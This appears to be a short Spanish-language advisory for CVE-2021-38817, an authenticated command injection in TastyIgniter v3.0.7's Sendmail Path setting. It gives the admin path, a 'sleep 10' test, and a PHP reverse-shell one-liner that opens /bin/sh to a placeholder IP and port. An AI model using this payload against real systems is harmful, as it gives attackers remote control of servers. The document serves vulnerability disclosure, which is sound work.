
Inyección remota de comandos del sistema operativo en el campo Sendmail Path de TastyIgniter v3.0.7
Inyección remota de comandos del sistema operativo autenticada/Ejecución remota de código en la parte web Sendmail de TastyIgniter v3.0.7 (CVE-2021-38817)
Existe una vulnerabilidad de inyección remota de comandos del sistema operativo autenticada en el menú de configuración de Sendmail de TastyIgniter v3.0.7 Restaurtant CMS para la aplicación web. El parámetro Sendmail Path no se sanitiza correctamente, como lo indica el comando /usr/sbin/sendmail -bs poblado en el campo, y permite que se inyecte un comando arbitrario agregando un punto y coma y un comando adicional del sistema operativo.
/admin/settings/edit/mail/admin/settings/edit/mailMail Protocol, seleccione SendmailSendMail Path, agregue un punto y coma y un comando arbitrario del sistema operativo, p. ej. /usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Matt Kiely (HuskyHacks) y Mike Padrick (Fearless), agosto de 2021
CVE asignado en octubre de 2022 (lmfao)